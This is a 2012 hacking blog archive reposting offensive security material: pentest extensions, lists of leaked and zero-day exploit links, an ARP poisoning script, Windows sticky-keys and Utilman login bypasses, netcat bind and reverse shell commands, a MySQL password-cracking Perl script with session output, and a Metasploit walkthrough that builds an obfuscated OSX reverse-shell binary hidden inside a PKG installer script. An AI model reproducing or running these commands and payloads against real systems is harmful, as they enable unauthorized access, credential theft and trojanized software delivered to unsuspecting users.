Dec 30, 2012

Chrome Extensions for Pentest

One of the best chrome extension that can See the geolocation, DNS, whois, routing, search results, hosting, domain neighbors, DNSBL, BGP and ASN information of every IP address (IPv4 and IPv6). Including shortcut to Your public IP Address. It can use for whois, network lookup, spam database lookup and more.


It is a extension that will help in the process of penetration testing, you can easily log, edit and send HTTP request. Request Maker only captures requests sent via HTML forms and XMLHttpRequests; it doesn't fill the log with useless information about images and style sheets.

If you dont want to share your information on the Internet than not sharing my info is a best extension for you, use this extension to substitute it with an anonymous alias. It can replace your real email address with fake email address and so on.


Simply the best, after information gathering scanning and enumeration is the second phase of ethical hacking process, so this extension will really help you to scan open ports just like nmap.

I think there is no need to discuss the importance of proxy and anonymity in the field of hacking. Hide My Ass! operates the most popular browser based web proxy online, this is our official extension that enables you to easily redirect your web traffic through our anonymous proxy network.

There are different coolies editor available on firefox, just like firefox we have Edit this cookie on chrome that can help you to edit any cookie, add any cookie, block cookies, delete all the cookies and many more.


XSS is a bug on a web application that allows an attacker to inject their code, if you are doing a penetration testing on a web application than XSS rays will help you to perform the test effective and efficient. It's core features include a XSS scanner, XSS Reverser and object inspection.


If you want to keep update your self with the latest exploits, shell code and white papers than this exploit DB extension will help you.


Right-click on any link and scan the target with VirusTotal, free and easy. It gives a feature of online virus scanner amazing extension.  

Source: http://www.ehacking.net/2011/07/chrome-extensions-for-security.html


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 27, 2012

News: W3 Total Cache vulnerability allows hacker to steal password and db info

Jason A. Donenfeld has discovered a Critical vulnerability in one of the famous wordpress plugin "W3 Total Cache".  The plugin helps to improve the user experience of your site by improving your server performance, caching every aspect of your site.

The cache data is stored in public accessible directory, which means a malicious hacker can browse and download the password hashes and other database information.

He also published a simple shell script to identify and exploit this bug:
http://git.zx2c4.com/w3-total-fail/tree/w3-total-fail.sh

  

Source: http://www.ehackingnews.com/2012/12/w3-total-cache-vulnerability-allows.html

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

0day grep DoS

If you want the full detail of this vulnerability, please go to the Source. 

$ perl -e 'print "x"x(2**31)' | grep x > /dev/null
 
This checkin adds this text to the NEWS file:

+ grep no longer dumps core on lines whose lengths do not fit in 'int'.
+ (e.g., lines longer than 2 GiB on a typical 64-bit host).
+ Instead, grep either works as expected, or reports an error.
+ An error can occur if not enough main memory is available, or if the
+ GNU C library's regular expression functions cannot handle such long lines.
+ [bug present since "the beginning"] 

Source: http://www.openwall.com/lists/oss-security/2012/12/22/1


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Anonymously uploading or host files with Anonfiles.com

If you want to upload or host file with anonymously, try to use anonfiles.com :)

Upload your files anonymously and free on AnonFiles.com. the maximum file size is 500 MB. :)


Source: https://anonfiles.com/ 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 25, 2012

Howto: Perl Script For Lookup Mac Address.

Sometimes, when you want to lookup Mac Address that what the vendor of this Mac Address, so you can use many online tools for that. But if you want to work offline in Backtrack 4, you can use this script for that. This script was develop by Hawkje.

#!/usr/bin/perl
# MAC address OUI checker
# Thijs (Thice) Bosschert
# http://www.thice.nl
# v0.1 24-06-2010

# Print header
print "\n  MAC address OUI checker v0.1\n".
      "  by Thijs (Thice) Bosschert\n\n";

# Check if argument has been given
if (!$ARGV[0]) {
  &error;
}

# Removing seperators from MAC address and uppercase chars
$ARGV[0] =~ s/[:|\s|-]//g;
$ARGV[0] =~ y/a-z/A-Z/;

# Get OUI from MAC
if ($ARGV[0] =~ /^([0-9a-f]{6})/i) {
  $OUI = $1;
  print "  Checking OUI: ".$OUI."\n";
} else {
  &error;
}

# Open OUI file from aircrack-ng
open(FILE,"/usr/local/etc/aircrack-ng/airodump-ng-oui.txt");
  while (<FILE>) {
    ($checkoui,$company) = split(/\(hex\)/,$_);
    $checkoui =~ s/[-|\s]//g;
    # Check if OUI can be found in the list
    if ($OUI eq $checkoui) {
      $company =~ s/\t//g;
      # Output found OUI
      print "  Found OUI: ".$OUI." - ".$company."\n\n";
      exit;
    }
  }
close(FILE);

# Show if OUI was not found
print "  Could not find OUI: ".$OUI."\n\n";

# Error messages
sub error {
  print "  Error: No MAC address or OUI specified or could not recognize it.\n".
        "    Usage: perl OUI_lookup.pl <MAC/OUI>\n".
        "    MAC can be submitted as:\n".
        "       001122334455\n".
        "       00:11:22:33:44:55\n".
        "       00-11-22-33-44-55\n".
        "    OUI can be submitted as:\n".
        "       001122\n".
        "       00:11:22\n".
        "       00-11-22\n\n";
  exit;
}



Source: http://www.backtrack-linux.org/forums/showthread.php?t=29819

 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 24, 2012

Howto: ARP Poisoning Shell Script By Pentestlab

#!/bin/bash
niccard=eth1
if [[ $EUID -ne 0 ]]; then
echo -e "\n\t\t\t33[1m 33[31m Script must be run as root! 33[0m \n"
echo -e "\t\t\t Example: sudo $0 \n"
exit 1
else
echo -e "\n33[1;32m#######################################"
echo -e "# ARP Poison Script #"
echo -e "#######################################"
echo -e " 33[1;31mCoded By:33[0m Travis Phillips"
echo -e " 33[1;31mDate Released:33[0m 03/27/2012"
echo -e " 33[1;31mWebsite:33[0m http://theunl33t.blogspot.com\n33[0m"
echo -n "Please enter target's IP: "
read victimIP
echo -n "Please enter Gateway's IP: "
read gatewayIP
echo -e "\n\t\t ---===[Time to Pwn]===---\n\n\n"
echo -e "\t\t--==[Targets]==--"
echo -e "\t\tTarget: $victimIP"
echo -e "\t\tGateway: $gatewayIP \n\n"
echo -e "[*] Enabling IP Forwarding \n"
echo "1" > /proc/sys/net/ipv4/ip_forward
echo -e "[*] Starting ARP Poisoning between $victimIP and $gatewayIP! \n"
xterm -e "arpspoof -i $niccard -t $victimIP $gatewayIP" &
fi



Source: http://pentestlab.wordpress.com/2012/12/22/arp-poisoning-script/ 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Benchmarks your web server with Apache Benchmarks

1. Apache Benchmarks
ab -k -n 50000 -c 200 -g gnuplot-output.txt http://target_ip
-k keep alive [Multiple requests within one HTTP session]
-n number of request
-c number of multiple request to perform at a time
-g gnuplot-file output

2. Create the png file to Benchmark display
$ gnuplot configfile

Example configfile
# output as png image
set terminal png

# save file to "benchmark.png"
set output "benchmark.png"

# graph a title
set title "ab -k -n 50000 -c 200"

# nicer aspect ratio for image size
set size 1,0.7

# y-axis grid
set grid y

# x-axis label
set xlabel "request"

# y-axis label
set ylabel "response time (ms)"

# plot data from "server1.txt" and "server2.txt" using column 9 with smooth sbezier lines
plot "server1.txt" using 9 smooth sbezier with lines title "server1:", \
     "server2.txt" using 9 smooth sbezier with lines title "server2:"


Source: http://www.kutukupret.com/2011/05/10/graphing-apachebench-results-using-gnuplot/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 20, 2012

Howto: Reset Mac admin password

Here's how to reset your OS X password without an OS X CD.
the Working solution for me was to create a new admin
you can create new admin like this by deleting a specific file.

You need to enter terminal and create a new admin account:

1. Reboot
2. Hold apple key + s key down after you hear the chime.
(command + s keys on newer Macs)
3. When you get text prompt enter in these terminal commands to create a brand new admin account (hitting return after each line):

mount -uw /
rm /var/db/.AppleSetupDone
shutdown -h now

4. After rebooting you should have a brand new admin account. It will take you through a new quick setup and once in you can do what ever you like to any account. Including resetting passwords.


Source:  http://top-hat-sec.com/forum/index.php?topic=1924.0

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 19, 2012

Havij Source Code Was Leaked

Long times ago, the Chinese hacker had disclosed this source code, so now it has public. If you want to download it, please go to the Source.


Source: http://www.garage4hackers.com/f11/havij-source-code-3161.html

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Private Exploit That Leak From 133day.com By Anonymous

Try it with your risk

[*] Google Market bug for Android 4.1.1 => 4.2 Jelly Bean Remote Target Download PoC
http://www.anonpaste.me/anonpaste2/index.php?a503d1b278bb225b#gCHxh6VzmlSQ5eMjWIC4ZRbu7lYs9E3mhA4Lu+RA2og=
[*] Snort Multiple HTTP Bypass <= 2.9.3.1 Exploit
http://www.anonpaste.me/anonpaste2/index.php?2846e235bb6f371b#7TWSQU7Bd2YV0ZGW6FKLMyW6sW7KKKUBjbsNKS7oH6c= [*] Blackberry Bluetooth Crash POC (OBEX PUSH)
http://www.anonpaste.me/anonpaste2/index.php?5477a5629400b644#RR8gAYFbjptbgHRBSt5zMqRheCjyrKidKCRj/6/FrO4=
[*] Mozilla FireFox 17.0 Memory Corruption p0c
http://www.anonpaste.me/anonpaste2/index.php?c825a678e8919146#WAF5uSQto3pwsgwicySrOa6NLqWty/6qZTXlAf0raUE= [*] vBulletin 4.2.0 Full Path Disclosure Vulnerability
http://www.anonpaste.me/anonpaste2/index.php?90b1648734cf8e34#OkWI8LDN+ql742lTjl5e052v21JB2vGASCaMcf5KONg=
[*] Wordpress 3.4.2 Full Path Disclosure Vulnerability
http://www.anonpaste.me/anonpaste2/index.php?1186993d410babb8#5oESnTDSiDz4TovKrnqOAP1dsb6hjy67ylM5X422uUo=
[*] vBulletin 4.x/5.x multiple Full Puth Disclosure Vulnerability
http://www.anonpaste.me/anonpaste2/index.php?e5768a52f2d79da3#jUIiiWXcXPvQY9kQa88ojumqzVb/C9oeSnoBP1RERLw= [*] RealPlayer .html v15.0.6.14 Memory Corruption and Overflow POC
http://www.anonpaste.me/anonpaste2/index.php?1721b55fa578ccec#JsRAVDh2ukfmUukd6+c7iw0eiCAF26BnCX5GsmCg06k= [*] IPBoard 3.x.x/3.4 Full Path Disclosure
http://www.anonpaste.me/anonpaste2/index.php?c64f91681ad35dee#r2qAofLijiGmoXid9At5HtMNkNiz7Xa8Oyu7yEfTXhQ=
[*] Steam Linux Closed Beta bypass authorization
http://www.anonpaste.me/anonpaste2/index.php?d391a81cbe3ed734#wowS3PnS1qfNvVAeGoY8gU49PSu92Y6B3ihSPWNlJMo= [*] WordPress 3.5 multiple path disclosure vulnerabilities
http://www.anonpaste.me/anonpaste2/index.php?7e0c2c2220e10f1e#pdmUOxmiqOk2YrPklsywJxg5aKJoX0+c6eDxqVqyKWE= [*] Joomla v1.5.x Error Based SQL Injection Vulnerability
http://www.anonpaste.me/anonpaste2/index.php?cc82dfaac7fad370#QPlKayTowzYtEFtxjsWDa2ydKLvM4062g6R58Y8xfR8=

 
Source: http://www.kernelmode.info/forum/viewtopic.php?f=13&t=2244

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 17, 2012

ScanPlanner - Scanning with NMAP Online

ScanPlanner is the easiest, fastest way to run NMAP scans and tests from the web. Schedule and track your network scans and vulnerability tests with our intuitive online interface.



Source: http://scanplanner.com/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

SQLI-LABS - Learning for your sql injection skill

SQLI-LABS is a platform to learn SQLI 
Following labs are covered for GET and POST scenarios:

1. Error Based Injections (Union Select)
 1. String
 2. Intiger
2. Error Based Injections (Double Injection Based)

3. BLIND Injections:
 1.Boolian Based
 2.Time Based
4. Update Query Injection.
5. Insert Query Injections.
6. Header Injections.
 1.Referer based.
 2.UserAgent based.
 3.Cookie based.
7. Second Order Injections
 
Source: https://github.com/Audi-1/sqli-labs 


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 15, 2012

Dec 14, 2012

Howto: Reset a forgot password Windows 7

This post just summary the step from the Source, if you want to see the picture of each step, please go to the Source. 

1. Create the System Repair Disk(Start button -> All Programs -> Maintenance -> Create a System Repair Disk

2. Reboot and load the System Repair Disk

3. In the menu after choose disk, click Command Prompt

4. copy c:\windows\system32\sethc.exe c:

5. copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe

6. Reboot and wait in Login Screen

7. hit the Shift button 5 times, you will get command prompt

8. Type the command "net user username password"

9. Now you can login with your new password

10. If you want to take the execute to be the past, use
copy c:\sethc.exe c:\windows\system32\sethc.exe     


Source: http://reboot.pro/topic/15751-reset-a-forgotten-windows-7-password-without-using-any-third-party-software-how-to-tutorial/ 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Reset a forgotten Windows 8 Password

This post just summary the step from the Source, if you want to see the picture of each step, please go to the Source.

1. Make a System Rescure CD (Go to control panel and navigate to Windows 7  File Recovery, click on that icon, and from the next screen choose from the top left ( Create a System Recovery Disk ) and follow the on-screen instructions to make that CD.)

2. Reboot windows and take the boot into your System Rescue CD.

3. When you're in the System Rescue CD, choose Troubleshoot -> Advance options -> Command Prompt

4. In the command prompt, run 'diskpart'

5. In the diskpart, run 'list vol'

6. Locate the windows partition, normally it will be C

7. Exit to the Command prompt with exit command

8. Type C: -> cd windows/system32/

9. Replace cmd.exe with Utilman.exe, del Utilman.exe -> ren cmd.exe Utilman.exe (You should back up each files before replace it.)

10. Restart with "shutdown -r -t 00"

11. Now when you're restart, Click the "Ease Of Access Center" in the left corner of login screen.

12. Now you will find the Command Prompt.

13. Type "net user" for list user in the PC.

14. Type "net user administrator *" for change administrator password, you can change administrator to another user that you want to change his/her password.

15. Change password

16. Exit to login screen and use your new password for login into the windows 8

17. Now you want to roll back into the previous command, use
 17.1 Type: c: 
 17.2 Type:  cd /windows/system32/
 17.3 Type:  del  Utilman.exe
 17.4 Type:  ren  Utilman.exe.original Utilman.exe

 17.5 Type: ren cmd.exe.original cmd.exe
 17.6 Type: shutdown  -r  -t  00 

Source: http://reboot.pro/topic/17872-reset-a-windows-8-password-without-using-any-third-party-software/
     

   

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 13, 2012

Howto: Netcat: TCP/IP Swiss Army Knife

Port Scanning: The act of systematically scanning a host for open ports. Once determined, these open ports can be utilized to gain access to the host or to launch an attack.
Banner Grabbing: A fingerprinting technique aimed at extract information about a host such as operating system, web server, applications etc. A simple form of banner grabbing is to send a request and analyze the response received.
Port Redirection: A simple technique used to transfer traffic from one port to another. It is utilized to access services which are restricted in any specific environment.
Honeypot: A Honeypot is a monitored decoy used to attract attackers away from critical resources and also a tool to analyze an attacker’s methods and characteristics. It can emulate various services provided by an OS and also generate responses for those services. It provides an environment which is capable of interacting with an attacker and monitors his/her activities without any real resources at risk.
First of all let’s see all the options provided by Netcat:
root@bt:~# nc -h
[v1.10-38]
connect to somewhere: nc [-options] hostname port[s] [ports] …
listen for inbound: nc -l -p port [-options] [hostname] [port]
options:
-c shell commands as `-e’; use /bin/sh to exec [dangerous!!]
-e filename program to exec after connect [dangerous!!]
-b allow broadcasts
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, …
-h this cruft
-i secs delay interval for lines sent, ports scanned
-k set keepalive option on socket
-l listen mode, for inbound connects
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-q secs quit after EOF on stdin and delay of secs
-s addr local source address
-T tos set Type Of Service
-t -t answer TELNET negotiation
-u UDP mode
-v -v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. ‘ftp\-data’).


1.Client-Server
1.1. Server
 nc –l –p 9999
1.2. Client
 nc server_ip 9999

2. Port Scanning
nc –v –w 2 –z target_ip1-204

3. Banner Grabbing
nc –vv target_ip 80







4. Port Forwarding
nc –l –p listen_port –c “nc destination destionation_port″

5. File Transfer
5.1 Server
nc -lv -p 9999 > save.file
5.2 Client
nc target_ip 9999 < target.file

6. Honeypot For this we need to set up Netcat in listen mode on a specific port and send a user-defined output to the incoming connection.
nc –lvvp 443 < apache2.txt
nc target_ip 443

7. Backdoor
Bind Shell
7.1 Victim
nc –lvvp 9999 –e cmd.exe
7.2 Hacker
nc –v victim_ip 9999

Reverse Shell
7.1 Victim
nc –lvvp 9999
7.2 Hacker
nc –v victim_ip 9999 -e /bin/bash


Source: http://resources.infosecinstitute.com/netcat-tcpip-swiss-army-knife/


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 12, 2012

Topera - TCP Port Scanner IPV6

Topera is a brand new TCP port scanner under IPv6, with the particularity that these scans are not detected by Snort.  

Source: http://code.google.com/p/topera/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Interesting Exploit in 2012-12-12

1. Snare Agent Linux Password Disclosure / CSRF Vulnerabilities
 http://1337day.com/exploit/19941

2.  Smartphone Pentest Framework 0.1.3 / 0.1.4 Command Injection
http://1337day.com/exploit/19942

3. Nagios Core 3.4.3 Buffer Overflow Vulnerability
http://1337day.com/exploit/19943

4. WordPress 3.5 multiple path disclosure vulnerabilities
http://1337day.com/exploits/19944

5. Microsoft windows remote desktop PoC C# Exploit
http://1337day.com/exploit/19946

6. WordPress ABC Test Plugin 0.1 Cross Site Script XSS
http://1337day.com/exploit/19947

7. WordPress ABC Test Plugin directory traversal
http://1337day.com/exploit/19948






If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

WiFi Monitor Mode with Android PCAP Capture

Required:
- Android device which supports USB host mode(such as the Galaxy Nexus or Nexus 7 should work)

- Wireless USB Adapter with RTL8187 chipset.

 
1. Install “Android PCAP Capture“ that was created by Mike “dragorn” Kershaw,

2. Connect USB On-The-Go to Android and wireless usb device.

3. Open Android PCAP Capture And start capture the traffic with your wireless usb device.

4. Transfer the pcap to your PC, to analysis the pcap file.


Source: http://www.thepowerbase.com/2012/12/wifi-monitor-mode-with-android-pcap-capture/


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Honeyproxy - Proxy to analysis HTTP(S) traffic


Features

  • Analyze HTTP(S) traffic on the fly
  • Filter and highlight traffic, regex support included.
  • Save HTTP conversations for later analysis
  • Make scripted changes with Python, e.g. remove Cache Header.
  • based on and compatible to mitmproxy.
  • cross-platform (Windows, OSX and Linux)
  • SSL interception certs generated on the fly 
Source: http://honeyproxy.org/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 10, 2012

Zeroday Of Authentication bypass FreeSSHD / FreeFTPD

Authentication bypass FreeSSHD / FreeFTPD
Posted on: December 9, 2012
Source: BUGTRAQ
SecurityVulns ID: 12755
Type: remote
Danger: 6/10
Description: Completion of the authorization is not checked when initiating client ssh session
Affected: WeOnlyDo : FreeSSHd 1/2
  WeOnlyDo : FreeFTPD 03/02
Files: FreeSSHD all version Remote Authentication Bypass ZERODAY

FreeFTPD all versions Remote System Level Exploit Zero-Day
Discuss: Read or leave comments to the news (0 comments)

Source: http://securityvulns.ru/news/FreeSSHD/AB.html

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 7, 2012

jSQL Injection - Java based automated SQL injection tool

An easy to use SQL injection tool to retrieve database informations from a distant server.
jSQL Injection features:
  • GET, POST, header, cookie methods
  • normal, error based, blind, time based algorithms
  • automatic best algorithms detection
  • data retrieving progression
  • proxy setting
  • evasion
  • for now supports MySQL
Download the java executable here, or access the source code for programmers in the Google Git repository. Current tools used for development: w7 eclipse easyphp notepad++ egit.
Next work: speed increase (100% faster, literally), more blind testing, automatic code testing (JUnit) 

Source: http://www.breakthesecurity.com/2012/11/jsqli-sql-injection-tool.html


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 6, 2012

Hyperfox transparently hijacking/proxying HTTP and HTTPs traffic

Installation

Before installing, make sure you have a working Go environment and git.
Check that your PATH and GOPATH variables are correctly set in your .bashrc, .zshrc or .profile file.
$ cat .zshrc
# ... stuff ...
export GOROOT=/usr/lib/go
export GOPATH=$HOME/go
export PATH=$PATH:$GOROOT/bin:$GOPATH/bin
And that pkg, src and bin exist.
$ mkdir -p $GOPATH/src
$ mkdir -p $GOPATH/bin
$ mkdir -p $GOPATH/pkg
Now attempt to install.
% go get github.com/xiam/hyperfox
% hyperfox -h

Usage example

Run hyperfox, it will start in HTTP mode listening at 0.0.0.0:9999 by default.
% hyperfox
If you want to analyze HTTPs instead of HTTP, use the -s flag and provide appropriate cert.pem and key.pem files.
% hyperfox -s -c ssl/cert.pem -k ssl/key.pem
hyperfox won’t be of much use if the host machine has no traffic to analyze or if the only traffic to analyze is its own.

Source: http://reventlov.com/projects/hyperfox
 
If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

DoS vulnerabilities in Internet Explorer 7 (access violation)



-------------------------
Affected products:
-------------------------

Vulnerable are Internet Explorer 7 (7.00.5730.13) and other versions of IE7.
IE6 and IE8 are not affected.

----------
Details:
----------

DoS:

When a redirector with response 301, 302 or 303 and data: URI in Location
header included into a tag frame or iframe, the browser crashes (the attack
doesn't work with other 30x statuses). It happens due to access violation
(aka segmentation fault) in iexplore.exe.

Exploit:

http://websecurity.com.ua/uploads/2012/IE7%20DoS.txt

This is 302 redirector on Perl. You can make similar redirectors with 301,
302 or 303 statuses.

As 301 redirector you can use my example with data: URI at TinyURL:

http://tinyurl.com/fj4hm

The attack works from the second attempt. So it's needed to go to redirector
twice (to set URL twice in address bar, or after appearing of error page to
return to previous page in the browser).

Example of attack with this redirector via vulnerability
(http://websecurity.com.ua/4526/) at United Nations' site (they haven't
fixed it since 29.04.2010, when I've found this hole and informed UN, so you
can use it for checking purposes):

http://www.un.org/zh/documents/view_doc.asp?url=http://tinyurl.com/fj4hm
 
Source:  http://seclists.org/fulldisclosure/2012/Dec/85

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 5, 2012

Interesting Exploit in 2012-12-05[Apache Tomcat]

Apache Tomcat 6.x / 7.x Denial Of Service 
http://packetstormsecurity.org/files/118615

Apache Tomcat Security Bypass
http://packetstormsecurity.org/files/118616

Apache Tomcat CSRF Prevention Filter Bypass 
http://packetstormsecurity.org/files/118617


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 4, 2012

MySQL Local/Remote FAST Account Password Cracking By Kingcope

The attacker logs into the mysql server with an unprivileged account.
There is a command in mysql called change_user, this command can be used
as the name suggests to change a user during a mysql session.
Since mysql is very fast in doing this it is much more powerful to crack
passwords rather than reconnecting every time to the mysql server to
brute force passwords
(what would be VERY slow).
Since the SALT does not change (and this is the weak point) in the
change_user command
it is a convienent way to crack passwords. (When connecting to mysql
in each connection
attempt the SALT is always different and sent out by the server). 
 
use Net::MySQL;

$|=1;

my $mysql = Net::MySQL->new(
 hostname => '192.168.2.3',
 database => 'test',
 user     => "user",
 password => "secret",
 debug => 0,
);

$crackuser = "crackme";

while(<stdin>) {
chomp;
$currentpass = $_;

$vv = join "\0",
                $crackuser,
                "\x14".
                Net::MySQL::Password->scramble(
                        $currentpass, $mysql->{salt}, $mysql->{client_capabilities}
                ) . "\0";
if ($mysql->_execute_command("\x11", $vv) ne undef) {
        print "[*] Cracked! --> $currentpass\n";
        exit;
}
}
---
example session:

C:\Users\kingcope\Desktop>C:\Users\kingcope\Desktop\john179\run\jo
hn --incremental --stdout=5 | perl mysqlcrack.pl
Warning: MaxLen = 8 is too large for the current hash type, reduced to 5
words: 16382  time: 0:00:00:02  w/s: 6262  current: citcH
words: 24573  time: 0:00:00:04  w/s: 4916  current: rap
words: 40956  time: 0:00:00:07  w/s: 5498  current: matc3
words: 49147  time: 0:00:00:09  w/s: 5030  current: 4429
words: 65530  time: 0:00:00:12  w/s: 5354  current: ch141
words: 73721  time: 0:00:00:14  w/s: 5021  current: v3n
words: 90104  time: 0:00:00:17  w/s: 5277  current: pun2
[*] Cracked! --> pass
words: 98295  time: 0:00:00:18  w/s: 5434  current: 43gs
Session aborted
 
Source: http://seclists.org/fulldisclosure/2012/Dec/58 


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Intesting Exploit in 2012-12-04 [Oracle, Web Application]

Oracle MySQL Privilege Escalation 
http://packetstormsecurity.org/files/118552

vBulletin 3.x <= 4.2.0 FAQ (Echo config) bug
http://1337day.com/exploit/19862 

Oracle MySQL 5.5.19-log Denial Of Service
http://packetstormsecurity.org/files/118553

Oracle MySQL Windows Stuxnet Technique SYSTEM Exploit 
http://packetstormsecurity.org/files/118554

Oracle MySQL User Account Enumeration Utility 
http://packetstormsecurity.org/files/118555

RIM BlackBerry PlayBook OS 1.0.8.6067 Local File Access Vulnerability 
http://1337day.com/exploit/19870

vBulletin 4.2.0 Full Path Disclosure Vulnerability
http://1337day.com/exploits/19874

Wordpress 3.4.2 Full Path Disclosure Vulnerability
http://1337day.com/exploits/19876

  
 

 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 2, 2012

Interesting Exploit 2012-12-02 [MySQL]

MySQL (Linux) Heap Based Overrun PoC Zeroday 

http://1337day.com/exploit/19850

MySQL Denial of Service Zeroday PoC

http://1337day.com/exploit/19851

MySQL (Linux) Database Privilege Elevation Zeroday Exploit

http://1337day.com/exploit/19852

MySQL 5.1/5.5 WiNDOWS REMOTE R00T (mysqljackpot)

http://1337day.com/exploit/19853

MySQL (Linux) Stack Based Buffer Overrun PoC Zeroday

http://1337day.com/exploit/19854

MySQL Remote Preauth User Enumeration Zeroday

http://1337day.com/exploit/19857

SSH.com Communications SSH Tectia Authentication Bypass Remote Zeroday Exploit

http://1337day.com/exploit/19858

MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day

http://1337day.com/exploit/19859




If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 1, 2012

Howto: Web shell in JSP,ASP,PHP By BruteLogic.



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Hacking OSX using Metasploit

This post just a summary from the Source. If you want to get the whole things and picture of howto, please go to the Source.

1. Create backdoor file with Metasploit
- ./msfpayload   osx/x86/shell_reverse_tcp  LHOST=$IP LPORT=$port EXITFUNC=thread R | ./msfencode -e x86/call4_dword_xor  > test.c
2.  Replacing the + at the end of file.
- sed -e 's/+/ /g' test.c > clean.c
- sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c
- echo "#include <stdio.h>" >> temp.c
- cat ready.c >> temp.c
- echo ";" >> temp.c
- echo "int main(void) { ((void (*)())micro)();" >> temp.c
- echo "}" >> temp.c
- mv temp.c final.c
- echo "final.c is ready in ShellCode, please compile it usig gcc on OSX"
- rm -f clean.c
- rm -f test.c
- rm -f ready.c
- rm -f rand.c
- rm -f temp2
- rm -f temp3
- rm -f temp4

3. Compile it with gcc
- gcc final.c -o OSXBin

4.  generate and obfuscate a Java meterpreter JAR file.
- ./msfpayload   java/meterpreter/reverse_tcp  LHOST=$IP LPORT=$port EXITFUNC=thread R  > test.jar


5. Obfuscation JAR file with ProGuard.(http://proguard.sourceforge.net/)

6. Create PKG file with Iceberg and edit install.sh similar this.
#!/bin/sh
/Applications/Utilities/OSXBin &
 
7.Setup listener for shell
./msfcli exploit/multi/handler  PAYLOAD=osx/x86/shell_reverse_tcp   LHOST=192.168.168.100 LPORT=80  E 


8. Setup listen for JAR
./msfcli exploit/multi/handler  PAYLOAD=java/meterpreter/reverse_tcp   LHOST=192.168.168.100 LPORT=81  E
 
9. Install pkg and run Java
java -jar /Applications/Utilities/obfuscated.jar 
 
 

Source: http://astr0baby.wordpress.com/2012/11/30/hacking-osx-using-metasploit/ 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.